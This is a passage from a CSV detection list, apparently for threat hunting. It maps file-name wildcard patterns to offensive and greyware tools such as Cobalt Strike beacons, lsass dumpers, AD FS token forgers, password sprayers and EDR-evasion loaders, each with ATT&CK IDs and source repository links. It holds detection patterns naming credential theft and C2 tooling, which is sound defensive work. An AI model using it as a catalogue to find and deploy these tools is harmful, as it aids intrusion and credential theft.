T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/G0ldenGunSec/GetWebDAVStatus","1","0","N/A","10","10","81","18","2021-09-29T17:40:52Z","2021-09-29T17:31:21Z" +"*\\pipe\\DAV RPC SERVICE*","offensive_tool_keyword","cobaltstrike","Determine if the WebClient Service (WebDAV) is running on a remote system","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/G0ldenGunSec/GetWebDAVStatus","1","0","N/A","10","10","81","18","2021-09-29T17:40:52Z","2021-09-29T17:31:21Z" +"*\1.bat","greyware_tool_keyword","_","Suspicious file names - One caracter executables often used by threat actors (warning false positives)","T1070.004 - T1059","TA0010 - TA0002","N/A","N/A","Defense Evasion","N/A","1","0","False positive rate can be high","2","10","N/A","N/A","N/A","N/A" +"*\1.dll","greyware_tool_keyword","_","Suspicious file names - One caracter executables often used by threat actors (warning false positives)","T1070.004 - T1059","TA0010 - TA0002","N/A","N/A","Defense Evasion","N/A","1","0","False positive rate can be high","2","10","N/A","N/A","N/A","N/A" +"*\1.Encrypt_shellcode*","offensive_tool_keyword","ReflectiveNtdll","A Dropper POC with a focus on aiding in EDR evasion - NTDLL Unhooking followed by loading ntdll in-memory which is present as shellcode","T1059 - T1059.003 - T1218.011 - T1027 - T1027.005 - T1070 - T1070.004","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/reveng007/ReflectiveNtdll","1","0","N/A","10","2","147","22","2023-02-10T05:30:28Z","2023-01-30T08:43:16Z" +"*\1.exe","greyware_tool_keyword","_","Suspicious file names - One caracter executables often used by threat actors (warning false positives)","T1070.004 - T1059","TA0010 - TA0002","N/A","N/A","Defense Evasion","N/A","1","0","False positive rate can be high","2","10","N/A","N/A","N/A","N/A" +"*\2.bat","greyware_tool_keyword","_","Suspicious file names - One caracter executables often used by threat actors (warning false positives)","T1070.004 - T1059","TA0010 - TA0002","N/A","N/A","Defense Evasion","N/A","1","0","False positive rate can be high","2","10","N/A","N/A","N/A","N/A" +"*\2.dll","greyware_tool_keyword","_","Suspicious file names - One caracter executables often used by threat actors (warning false positives)","T1070.004 - T1059","TA0010 - TA0002","N/A","N/A","Defense Evasion","N/A","1","0","False positive rate can be high","2","10","N/A","N/A","N/A","N/A" +"*\2.exe","greyware_tool_keyword","_","Suspicious file names - One caracter executables often used by threat actors (warning false positives)","T1070.004 - T1059","TA0010 - TA0002","N/A","N/A","Defense Evasion","N/A","1","0","False positive rate can be high","2","10","N/A","N/A","N/A","N/A" +"*\3.bat","greyware_tool_keyword","_","Suspicious file names - One caracter executables often used by threat actors (warning false positives)","T1070.004 - T1059","TA0010 - TA0002","N/A","N/A","Defense Evasion","N/A","1","0","False positive rate can be high","2","10","N/A","N/A","N/A","N/A" +"*\3.dll","greyware_tool_keyword","_","Suspicious file names - One caracter executables often used by threat actors (warning false positives)","T1070.004 - T1059","TA0010 - TA0002","N/A","N/A","Defense Evasion","N/A","1","0","False positive rate can be high","2","10","N/A","N/A","N/A","N/A" +"*\3.exe","greyware_tool_keyword","_","Suspicious file names - One caracter executables often used by threat actors (warning false positives)","T1070.004 - T1059","TA0010 - TA0002","N/A","N/A","Defense Evasion","N/A","1","0","False positive rate can be high","2","10","N/A","N/A","N/A","N/A" +"*\4.bat","greyware_tool_keyword","_","Suspicious file names - One caracter executables often used by threat actors (warning false positives)","T1070.004 - T1059","TA0010 - TA0002","N/A","N/A","Defense Evasion","N/A","1","0","False positive rate can be high","2","10","N/A","N/A","N/A","N/A" +"*\4.dll","greyware_tool_keyword","_","Suspicious file names - One caracter executables often used by threat actors (warning false positives)","T1070.004 - T1059","TA0010 - TA0002","N/A","N/A","Defense Evasion","N/A","1","0","False positive rate can be high","2","10","N/A","N/A","N/A","N/A" +"*\4.exe","greyware_tool_keyword","_","Suspicious file names - One caracter executables often used by threat actors (warning false positives)","T1070.004 - T1059","TA0010 - TA0002","N/A","N/A","Defense Evasion","N/A","1","0","False positive rate can be high","2","10","N/A","N/A","N/A","N/A" +"*\5.bat","greyware_tool_keyword","_","Suspicious file names - One caracter executables often used by threat actors (warning false positives)","T1070.004 - T1059","TA0010 - TA0002","N/A","N/A","Defense Evasion","N/A","1","0","False positive rate can be high","2","10","N/A","N/A","N/A","N/A" +"*\5.dll","greyware_tool_keyword","_","Suspicious file names - One caracter executables often used by threat actors (warning false positives)","T1070.004 - T1059","TA0010 - TA0002","N/A","N/A","Defense Evasion","N/A","1","0","False positive rate can be high","2","10","N/A","N/A","N/A","N/A" +"*\5.exe","greyware_tool_keyword","_","Suspicious file names - One caracter executables often used by threat actors (warning false positives)","T1070.004 - T1059","TA0010 - TA0002","N/A","N/A","Defense Evasion","N/A","1","0","False positive rate can be high","2","10","N/A","N/A","N/A","N/A" +"*\6.bat","greyware_tool_keyword","_","Suspicious file names - One caracter executables often used by threat actors (warning false positives)","T1070.004 - T1059","TA0010 - TA0002","N/A","N/A","Defense Evasion","N/A","1","0","False positive rate can be high","2","10","N/A","N/A","N/A","N/A" +"*\6.dll","greyware_tool_keyword","_","Suspicious file names - One caracter executables often used by threat actors (warning false positives)","T1070.004 - T1059","TA0010 - TA0002","N/A","N/A","Defense Evasion","N/A","1","0","False positive rate can be high","2","10","N/A","N/A","N/A","N/A" +"*\6.exe","greyware_tool_keyword","_","Suspicious file names - One caracter executables often used by threat actors (warning false positives)","T1070.004 - T1059","TA0010 - TA0002","N/A","N/A","Defense Evasion","N/A","1","0","False positive rate can be high","2","10","N/A","N/A","N/A","N/A" +"*\7.bat","greyware_tool_keyword","_","Suspicious file names - One caracter executables often used by threat actors (warning false positives)","T1070.004 - T1059","TA0010 - TA0002","N/A","N/A","Defense Evasion","N/A","1","0","False positive rate can be high","2","10","N/A","N/A","N/A","N/A" +"*\7.dll","greyware_tool_keyword","_","Suspicious file names - One caracter executables often used by threat actors (warning false positives)","T1070.004 - T1059","TA0010 - TA0002","N/A","N/A","Defense Evasion","N/A","1","0","False positive rate can be high","2","10","N/A","N/A","N/A","N/A" +"*\7.exe","greyware_tool_keyword","_","Suspicious file names - One caracter executables often used by threat actors (warning false positives)","T1070.004 - T1059","TA0010 - TA0002","N/A","N/A","Defense Evasion","N/A","1","0","False positive rate can be high","2","10","N/A","N/A","N/A","N/A" +"*\8.bat","greyware_tool_keyword","_","Suspicious file names - One caracter executables often used by threat actors (warning false positives)","T1070.004 - T1059","TA0010 - TA0002","N/A","N/A","Defense Evasion","N/A","1","0","False positive rate can be high","2","10","N/A","N/A","N/A","N/A" +"*\8.dll","greyware_tool_keyword","_","Suspicious file names - One caracter executables often used by threat actors (warning false positives)","T1070.004 - T1059","TA0010 - TA0002","N/A","N/A","Defense Evasion","N/A","1","0","False positive rate can be high","2","10","N/A","N/A","N/A","N/A" +"*\8.exe","greyware_tool_keyword","_","Suspicious file names - One caracter executables often used by threat actors (warning false positives)","T1070.004 - T1059","TA0010 - TA0002","N/A","N/A","Defense Evasion","N/A","1","0","False positive rate can be high","2","10","N/A","N/A","N/A","N/A" +"*\8e8988b257e9dd2ea44ff03d44d26467b7c9ec16*","offensive_tool_keyword","cobaltstrike","A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. etc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/yanghaoi/CobaltStrike_CNA","1","0","N/A","10","10","403","78","2022-01-18T12:47:55Z","2021-04-21T13:10:11Z" +"*\9.bat","greyware_tool_keyword","_","Suspicious file names - One caracter executables often used by threat actors (warning false positives)","T1070.004 - T1059","TA0010 - TA0002","N/A","N/A","Defense Evasion","N/A","1","0","False positive rate can be high","2","10","N/A","N/A","N/A","N/A" +"*\9.dll","greyware_tool_keyword","_","Suspicious file names - One caracter executables often used by threat actors (warning false positives)","T1070.004 - T1059","TA0010 - TA0002","N/A","N/A","Defense Evasion","N/A","1","0","False positive rate can be high","2","10","N/A","N/A","N/A","N/A" +"*\9.exe","greyware_tool_keyword","_","Suspicious file names - One caracter executables often used by threat actors (warning false positives)","T1070.004 - T1059","TA0010 - TA0002","N/A","N/A","Defense Evasion","N/A","1","0","False positive rate can be high","2","10","N/A","N/A","N/A","N/A" +"*\AbandonedCOMKeys.*","offensive_tool_keyword","AbandonedCOMKeys","Enumerates abandoned COM keys (specifically InprocServer32). Useful for persistence","T1547.011 - T1049 - T1087.002","TA0005 - TA0007 - TA0003","N/A","N/A","Persistence","https://github.com/matterpreter/OffensiveCSharp/tree/master/AbandonedCOMKeys","1","0","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*\adcs.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*\ADCSPwn*","offensive_tool_keyword","ADCSPwn","A tool to escalate privileges in an active directory network by coercing authenticate from machine accounts and relaying to the certificate service","T1550.002 - T1078.003 - T1110.003","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/bats3c/ADCSPwn","1","0","N/A","10","8","749","119","2023-03-20T20:30:40Z","2021-07-30T15:04:41Z" +"*\add_computer.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*\ADFSpoof.py*","offensive_tool_keyword","ADFSpoof","A python tool to forge AD FS security tokens.","T1600 - T1600.001 - T1552 - T1552.004","TA0006 - TA0001","N/A","N/A","Sniffing & Spoofing","https://github.com/mandiant/ADFSpoof","1","0","N/A","10","4","300","52","2023-09-21T17:14:52Z","2019-03-20T22:30:58Z" +"*\ADFSpray*","offensive_tool_keyword","adfspray","Python3 tool to perform password spraying against Microsoft Online service using various methods","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/xFreed0m/ADFSpray","1","0","N/A","N/A","1","76","14","2023-03-12T00:21:34Z","2020-04-23T08:56:51Z" +"*\ADGet.exe*","greyware_tool_keyword","adget","gather valuable informations about the AD environment","T1018 - T1027 - T1046 - T1057 - T1069 - T1087 - T1098 - T1482","TA0001 - TA0002 - TA0003 - TA0007 - TA0011","N/A","N/A","Discovery","https://thedfirreport.com/2023/05/22/icedid-macro-ends-in-nokoyawa-ransomware/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*\adm2sys.py*","offensive_tool_keyword","PyExec","This is a very simple privilege escalation technique from admin to System. This is the same technique PSExec uses.","T1134 - T1055 - T1548.002","TA0004 - TA0005 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/OlivierLaflamme/PyExec","1","0","N/A","9","1","10","6","2019-09-11T13:56:04Z","2019-09-11T13:54:15Z" +"*\admin-panels.txt*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"*\agent_exe.exe*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","0","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z" +"*\alan.log*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","0","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z" +"*\Alan.v*.zip*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","0","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z" +"*\Alcatraz.exe*","offensive_tool_keyword","Alcatraz","x64 binary obfuscator","T1027 - T1140","TA0004 - TA0042","N/A","N/A","Defense Evasion","https://github.com/weak1337/Alcatraz","1","1","N/A","10","10","1345","219","2023-07-14T14:19:01Z","2022-12-21T17:27:56Z" +"*\All_attack.txt*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"*\Andrew.dmp*","offensive_tool_keyword","AndrewSpecial","AndrewSpecial - dumping lsass memory stealthily","T1003.001 - T1055.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/hoangprod/AndrewSpecial","1","0","N/A","10","4","370","101","2019-06-02T02:49:28Z","2019-01-18T19:12:09Z" +"*\Angry IP Scanner.app*","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/angryip/ipscan","1","0","N/A","7","10","3518","683","2023-09-11T16:36:25Z","2011-06-28T20:58:48Z" +"*\AntiSandbox.go*","offensive_tool_keyword","goMatrixC2","C2 leveraging Matrix/Element Messaging Platform as Backend to control Implants in goLang.","T1090 - T1027 - T1071","TA0011 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/n1k7l4i/goMatrixC2","1","1","N/A","10","10","0","2","2023-09-11T10:20:41Z","2023-08-31T09:36:38Z" +"*\AntiSandbox.go*","offensive_tool_keyword","goZulipC2","C2 leveraging Zulip Messaging Platform as Backend.","T1090 - T1090.003 - T1071 - T1071.001","TA0011 - TA0009","N/A","N/A","C2","https://github.com/n1k7l4i/goZulipC2","1","0","N/A","10","10","5","2","2023-08-31T12:06:58Z","2023-08-13T11:04:20Z" +"*\AoratosWin*","offensive_tool_keyword","AoratosWin","A tool that removes traces of executed applications on Windows OS.","T1070 - T1564","TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/PinoyWH1Z/AoratosWin","1","0","N/A","N/A","2","117","18","2022-09-04T09:15:35Z","2022-09-04T09:04:35Z" +"*\APCLdr.*","offensive_tool_keyword","APCLdr","APCLdr: Payload Loader With Evasion Features","T1027 - T1055 - T1055.002 - T1055.003 - T1070 - T1070.004 - T1071 - T1106 - T1574.001","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/NUL0x4C/APCLdr","1","1","N/A","N/A","3","285","51","2023-01-22T04:24:33Z","2023-01-21T18:09:36Z" +"*\Apollo.exe*","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","1","N/A","10","10","401","83","2023-08-17T14:46:04Z","2020-11-09T08:05:16Z" +"*\AppData\Local\Microsoft\CLR_*\UsageLogs\*.exe.log*","greyware_tool_keyword","cobaltstrike","If cobaltstrike uses execute-assembly there is a chance that a file will be created in the UsageLogs logs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://bohops.com/2021/03/16/investigating-net-clr-usage-log-tampering-techniques-for-edr-evasion/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"*\AppData\Local\Temp\Procmon.exe*","greyware_tool_keyword","procmon","Procmon used in user temp folder","T1059.001 - T1036 - T1569.002","TA0002 - TA0006","N/A","N/A","Reconnaissance","N/A","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*\AppData\Local\Temp\Procmon64.exe*","greyware_tool_keyword","procmon","Procmon used in user temp folder","T1059.001 - T1036 - T1569.002","TA0002 - TA0006","N/A","N/A","Reconnaissance","N/A","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*\asm\x64\alter_pe_sections*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","0","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z" +"*\asm\x86\alter_pe_sections*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","0","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z" +"*\Athena-*.zip*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"*\AtomLdr\x64*","offensive_tool_keyword","AtomLdr","A DLL loader with advanced evasive features","T1071.004 - T1574.001 - T1574.002 - T1071.001 - T1055.003 - T1059.003 - T1546.003 - T1574.003 - T1574.004 - T1059.001 - T1569.002","TA0011 - TA0006 - TA0002 - TA0008 - TA0007","N/A","N/A","Exploitation tools","https://github.com/NUL0x4C/AtomLdr","1","0","N/A","N/A","6","543","78","2023-02-26T19:57:09Z","2023-02-26T17:59:26Z" +"*\attrib.exe* +H *","greyware_tool_keyword","attrib","command aiming to hide a file. It can be performed with attrib.exe on a WINDOWS machine with command option +h ","T1562.001","TA0040 - TA0002","N/A","N/A","Defense Evasion","N/A","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*\AutoSmuggle\*.cs*","offensive_tool_keyword","AutoSmuggle","Utility to craft HTML or SVG smuggled files for Red Team engagements","T1027.006 - T1598","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/surajpkhetani/AutoSmuggle","1","0","N/A","9","2","142","21","2023-09-02T08:09:50Z","2022-03-20T19:02:06Z" +"*\autotimeline*","offensive_tool_keyword","autotimeliner","Automagically extract forensic timeline from volatile memory dumps.","T1547 - T1057 - T1003","TA0005 - TA0008","N/A","N/A","Forensic Exploitation tools","https://github.com/andreafortuna/autotimeliner","1","1","N/A","N/A","2","119","23","2023-03-17T07:29:34Z","2018-11-12T16:13:32Z" +"*\avetdbg.txt*","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","10","10","1523","344","2023-03-24T16:50:08Z","2017-01-28T14:56:47Z" +"*\avred.py*","offensive_tool_keyword","avred","Avred is being used to identify which parts of a file are identified by a Antivirus and tries to show as much possible information and context about each match.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/dobin/avred","1","0","N/A","9","2","173","19","2023-09-30T12:28:42Z","2022-05-19T12:12:34Z" +"*\avred.py*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*\avredweb.py *","offensive_tool_keyword","avred","Avred is being used to identify which parts of a file are identified by a Antivirus and tries to show as much possible information and context about each match.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/dobin/avred","1","0","N/A","9","2","173","19","2023-09-30T12:28:42Z","2022-05-19T12:12:34Z" +"*\AzureC2Proxy\*","offensive_tool_keyword","AzureC2Relay","AzureC2Relay is an Azure Function that validates and relays Cobalt Strike beacon traffic by verifying the incoming requests based on a Cobalt Strike Malleable C2 profile.","T1090 - T1090.003 - T1027 - T1027.005 - T1071 - T1071.001","TA0042 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/Flangvik/AzureC2Relay","1","0","N/A","10","10","198","47","2021-02-15T18:06:38Z","2021-02-14T00:03:52Z" +"*\AzureC2Relay*","offensive_tool_keyword","AzureC2Relay","AzureC2Relay is an Azure Function that validates and relays Cobalt Strike beacon traffic by verifying the incoming requests based on a Cobalt Strike Malleable C2 profile.","T1090 - T1090.003 - T1027 - T1027.005 - T1071 - T1071.001","TA0042 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/Flangvik/AzureC2Relay","1","1","N/A","10","10","198","47","2021-02-15T18:06:38Z","2021-02-14T00:03:52Z" +"*\AzureHound.ps1*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*\BabelStrike.py*","offensive_tool_keyword","BabelStrike","The purpose of this tool is to normalize and generate possible usernames out of a full names list that may include names written in multiple (non-English) languages. common problem occurring from scraped employee names lists (e.g. from Linkedin)","T1078 - T1114","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/t3l3machus/BabelStrike","1","0","N/A","1","1","38","13","2023-09-12T13:49:30Z","2023-01-10T07:59:00Z" +"*\backdoored\*","offensive_tool_keyword","the-backdoor-factory","Patch PE ELF Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/secretsquirrel/the-backdoor-factory","1","0","N/A","10","10","3186","809","2023-08-14T02:52:06Z","2013-05-30T01:04:24Z" +"*\BackupOperatorToDA*","offensive_tool_keyword","BackupOperatorToDA","From an account member of the group Backup Operators to Domain Admin without RDP or WinRM on the Domain Controller","T1078 - T1078.003 - T1021 - T1021.006 - T1112 - T1003.003","TA0005 - TA0001 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/mpgn/BackupOperatorToDA","1","0","N/A","10","4","335","48","2022-10-05T07:29:46Z","2022-02-15T20:51:46Z" +"*\BadZure*","offensive_tool_keyword","badazure","BadZure orchestrates the setup of Azure Active Directory tenants populating them with diverse entities while also introducing common security misconfigurations to create vulnerable tenants with multiple attack paths","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/mvelazc0/BadZure/","1","0","N/A","5","4","302","18","2023-07-27T15:40:41Z","2023-05-05T04:52:21Z" +"*\basicKitten.exe*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","0","N/A","10","10","176","35","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" +"*\beacon.exe*","offensive_tool_keyword","cobaltstrike","A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. etc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda 